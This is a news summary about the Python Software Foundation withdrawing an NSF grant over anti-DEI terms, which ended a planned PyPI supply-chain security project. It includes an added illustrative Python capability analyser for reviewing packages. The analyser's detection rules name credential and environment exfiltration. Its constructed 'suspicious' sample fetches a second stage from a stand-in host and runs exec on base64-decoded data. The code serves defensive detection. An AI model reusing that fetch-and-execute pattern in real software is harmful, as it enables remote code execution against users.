Trump admin anti-DEI rules block Python security upgrade

Summary
– The Python Software Foundation withdrew its NSF grant application because it couldn’t agree to terms prohibiting any DEI programming, which contradicted its mission and values.
– The Carpentries previously withdrew a similar NSF proposal after their DEI content was flagged as non-compliant with NSF priorities regarding underrepresented student retention.
– Both organizations objected to the NSF’s May rule change prohibiting grant recipients from advancing diversity, equity, and inclusion in any programs, even those not funded by NSF.
– The withdrawn Python project would have developed automated security tools to proactively review PyPI packages and protect users from supply-chain attacks across multiple open-source ecosystems.
– The Python Software Foundation is now seeking alternative funding through donations to complete the security project that would benefit PyPI, NPM, and Crates.io users.
The Python Software Foundation recently made the difficult choice to withdraw a significant grant application from the National Science Foundation, a decision driven by new federal stipulations concerning diversity, equity, and inclusion (DEI) initiatives. After extensive consultations and a review of how other groups handled similar situations, the foundation’s board concluded it could not accept terms that would restrict its core mission. The foundation stated it explored every possible avenue to reconcile the grant’s requirements with its own deeply held principles but ultimately found the conditions untenable.
This situation mirrors an earlier case involving The Carpentries, an organization dedicated to teaching computational skills. In June, they also pulled a grant proposal after being notified it was flagged for DEI content. The specific issue cited was their focus on “the retention of underrepresented students,” which was deemed misaligned with the NSF’s updated priorities. A major concern for both organizations is a rule change from May that prohibits grant recipients from advancing or promoting DEI in any of their programs, not just those funded by the NSF. The Carpentries explained that accepting the funds would have forced them to discontinue all DEI-focused programming, a commitment they were unwilling to abandon.
For the Python Software Foundation, agreeing to a clause stating they would not operate any programs that “advance or promote” diversity, equity, and inclusion was simply not an option. The board viewed such an agreement as a direct betrayal of its mission and the community it serves, leading to a unanimous vote to withdraw the application. This decision comes with considerable disappointment, as the proposed project promised substantial security enhancements for the open-source ecosystem.
The now-defunct project was designed to protect millions of PyPI users from attempted supply-chain attacks. It aimed to develop new tools for the automated, proactive review of every package uploaded to the Python Package Index, moving beyond the current system that only reacts to problems. These innovative tools would have utilized capability analysis built upon a dataset of known malware. The potential impact extended far beyond Python; the resulting technology could have been adapted for other major open-source software registries like NPM and Crates.io, thereby improving security across multiple programming ecosystems.
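The article does not describe how the withdrawn project's tooling would have worked, so the following is an added illustration rather than the Python Software Foundation's code: a small static "capability analysis" pass over a package's source. It resolves import aliases, maps calls to coarse capabilities (network, process execution, dynamic code, blob decoding, credential or environment reads), and compares the resulting set against a few capability combinations that a dataset of known malware might be expected to contain. The call-to-capability mapping, the suspicious combinations and both sample packages are constructed for this example; a real reviewer would derive the profile from actual labelled data.

```python
"""Static capability analysis of a Python source file, illustrating the kind of
proactive, automated package review the article describes.  Constructed example:
not the PSF's tooling; mappings and samples below are made up for illustration."""
import ast
from typing import Dict, Set

# Dotted call name -> coarse capability.  This taxonomy is an assumption.
CAPABILITY_CALLS: Dict[str, str] = {
    "socket.socket": "network",
    "urllib.request.urlopen": "network",
    "requests.get": "network",
    "requests.post": "network",
    "subprocess.Popen": "process_exec",
    "subprocess.run": "process_exec",
    "subprocess.call": "process_exec",
    "os.system": "process_exec",
    "exec": "dynamic_code",
    "eval": "dynamic_code",
    "compile": "dynamic_code",
    "base64.b64decode": "decode_blob",
    "os.environ.get": "env_read",
    "getpass.getpass": "credential_read",
}

# Constructed "known malware" profile: capability combinations that, together,
# warrant human review.  Real tooling would learn these from labelled samples.
SUSPICIOUS_COMBINATIONS: Dict[str, Set[str]] = {
    "obfuscated_payload": {"decode_blob", "dynamic_code"},
    "remote_code_fetch": {"network", "dynamic_code"},
    "credential_exfil": {"credential_read", "network"},
    "env_exfil": {"env_read", "network"},
}


def _alias_map(tree: ast.AST) -> Dict[str, str]:
    """Map local names to the fully qualified names they were imported as."""
    aliases: Dict[str, str] = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                aliases[a.asname or a.name] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _dotted_name(node: ast.AST) -> str:
    """Return 'a.b.c' for a Name/Attribute chain, or '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _resolve(name: str, aliases: Dict[str, str]) -> str:
    """Rewrite the leading component through the import alias table."""
    head, _, rest = name.partition(".")
    head = aliases.get(head, head)
    return f"{head}.{rest}" if rest else head


def extract_capabilities(source: str) -> Set[str]:
    """Collect the coarse capabilities implied by the calls in `source`."""
    tree = ast.parse(source)
    aliases = _alias_map(tree)
    caps: Set[str] = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _resolve(_dotted_name(node.func), aliases)
            if name in CAPABILITY_CALLS:
                caps.add(CAPABILITY_CALLS[name])
    return caps


def review_package(source: str) -> dict:
    """Return capabilities, matched suspicious patterns and a review flag.
    Source that does not even parse is itself routed to review."""
    try:
        caps = extract_capabilities(source)
    except SyntaxError:
        return {"capabilities": [], "matched_patterns": ["unparseable"], "needs_review": True}
    hits = sorted(k for k, needed in SUSPICIOUS_COMBINATIONS.items() if needed <= caps)
    return {"capabilities": sorted(caps), "matched_patterns": hits, "needs_review": bool(hits)}


# Constructed sample packages (not real uploads).
BENIGN_SAMPLE = '''
import json, os
def load_config(path):
    with open(path) as fh:
        return json.load(fh)
def debug_enabled():
    return os.environ.get("APP_DEBUG") == "1"
'''

SUSPICIOUS_SAMPLE = '''
import base64 as b64
from urllib.request import urlopen
import subprocess
PAYLOAD = "<placeholder, not a real blob>"
def install_hook():
    staged = urlopen("http://example.invalid/stage2").read()
    exec(b64.b64decode(PAYLOAD))
    subprocess.run(["echo", "done"])
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        print(label, review_package(src))
```

The point of the alias resolution is that `import base64 as b64` or `from urllib.request import urlopen` must map to the same capability as the fully qualified call; a reviewer that matched only on literal names would be trivially bypassed. Because a package is judged on combinations rather than any single call, ordinary uses of `os.environ.get` or `subprocess.run` alone do not trigger review.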
Despite this setback, the Python Software Foundation remains committed to finding a way to complete this critical security work. The organization has concluded its public statement by issuing a call for support, encouraging both individual developers and corporate entities that rely on Python to consider making donations to help fund these vital security upgrades independently.
(Source: Ars Technica)